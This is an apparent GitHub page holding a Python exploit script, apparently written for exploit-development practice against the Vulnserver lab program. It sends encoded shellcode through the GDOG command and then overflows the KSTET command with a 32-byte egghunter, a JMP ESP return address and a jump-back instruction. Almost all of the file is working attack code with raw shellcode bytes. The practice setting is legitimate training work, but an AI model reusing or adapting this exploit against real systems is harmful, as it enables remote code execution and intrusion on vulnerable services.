-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathKSTET_EIP_EGGHUNTER.py
73 lines (56 loc) · 2.59 KB
/
KSTET_EIP_EGGHUNTER.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.101.158',9999))
print "[*] Sending initial shellcode"
shellcode = "GDOG "
shellcode += "DINADINA"
# Payload size: 351 bytes
shellcode += "\xbe\x52\x2c\x7c\x53\xd9\xf6\xd9\x74\x24\xf4\x5b\x29"
shellcode += "\xc9\xb1\x52\x31\x73\x12\x83\xc3\x04\x03\x21\x22\x9e"
shellcode += "\xa6\x39\xd2\xdc\x49\xc1\x23\x81\xc0\x24\x12\x81\xb7"
shellcode += "\x2d\x05\x31\xb3\x63\xaa\xba\x91\x97\x39\xce\x3d\x98"
shellcode += "\x8a\x65\x18\x97\x0b\xd5\x58\xb6\x8f\x24\x8d\x18\xb1"
shellcode += "\xe6\xc0\x59\xf6\x1b\x28\x0b\xaf\x50\x9f\xbb\xc4\x2d"
shellcode += "\x1c\x30\x96\xa0\x24\xa5\x6f\xc2\x05\x78\xfb\x9d\x85"
shellcode += "\x7b\x28\x96\x8f\x63\x2d\x93\x46\x18\x85\x6f\x59\xc8"
shellcode += "\xd7\x90\xf6\x35\xd8\x62\x06\x72\xdf\x9c\x7d\x8a\x23"
shellcode += "\x20\x86\x49\x59\xfe\x03\x49\xf9\x75\xb3\xb5\xfb\x5a"
shellcode += "\x22\x3e\xf7\x17\x20\x18\x14\xa9\xe5\x13\x20\x22\x08"
shellcode += "\xf3\xa0\x70\x2f\xd7\xe9\x23\x4e\x4e\x54\x85\x6f\x90"
shellcode += "\x37\x7a\xca\xdb\xda\x6f\x67\x86\xb2\x5c\x4a\x38\x43"
shellcode += "\xcb\xdd\x4b\x71\x54\x76\xc3\x39\x1d\x50\x14\x3d\x34"
shellcode += "\x24\x8a\xc0\xb7\x55\x83\x06\xe3\x05\xbb\xaf\x8c\xcd"
shellcode += "\x3b\x4f\x59\x41\x6b\xff\x32\x22\xdb\xbf\xe2\xca\x31"
shellcode += "\x30\xdc\xeb\x3a\x9a\x75\x81\xc1\x4d\xba\xfe\xad\xbf"
shellcode += "\x52\xfd\x2d\xc1\x19\x88\xcb\xab\x4d\xdd\x44\x44\xf7"
shellcode += "\x44\x1e\xf5\xf8\x52\x5b\x35\x72\x51\x9c\xf8\x73\x1c"
shellcode += "\x8e\x6d\x74\x6b\xec\x38\x8b\x41\x98\xa7\x1e\x0e\x58"
shellcode += "\xa1\x02\x99\x0f\xe6\xf5\xd0\xc5\x1a\xaf\x4a\xfb\xe6"
shellcode += "\x29\xb4\xbf\x3c\x8a\x3b\x3e\xb0\xb6\x1f\x50\x0c\x36"
shellcode += "\x24\x04\xc0\x61\xf2\xf2\xa6\xdb\xb4\xac\x70\xb7\x1e"
shellcode += "\x38\x04\xfb\xa0\x3e\x09\xd6\x56\xde\xb8\x8f\x2e\xe1"
shellcode += "\x75\x58\xa7\x9a\x6b\xf8\x48\x71\x28\x52\x73\x9b\x12"
shellcode += "\xcb\xda\xce\x10\x96\xdc\x25\x56\xaf\x5e\xcf\x27\x54"
shellcode += "\x7e\xba\x22\x10\x38\x57\x5f\x09\xad\x57\xcc\x2a\xe4"
shellcode += "\x90"*(500-351)
print s.recv(1024)
s.send(shellcode + '\r\n')
print s.recv(1024)
buf = 'KSTET /.:/'
# [*] Exact match at offset 66
buf += "A"*2
### Egghunter Lenght is 32
buf += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c"
buf += "\x05\x5a\x74\xef\xb8\x44\x49\x4e\x41\x89\xd7\xaf\x75"
buf += "\xea\xaf\x75\xe7\xff\xe7"
buf += "A"*(66-32-2)
#buf += "B"*4
# 625011AF JMP ESP
buf += "\xaf\x11\x50\x62"
buf += "\xEB\xBA" # Jump Back
buf += "C"*(100-2)
print "Fuzzing TRUN with %s bytes" % len(buf)
s.send(buf + '\r\n')
print s.recv(1024)
s.close()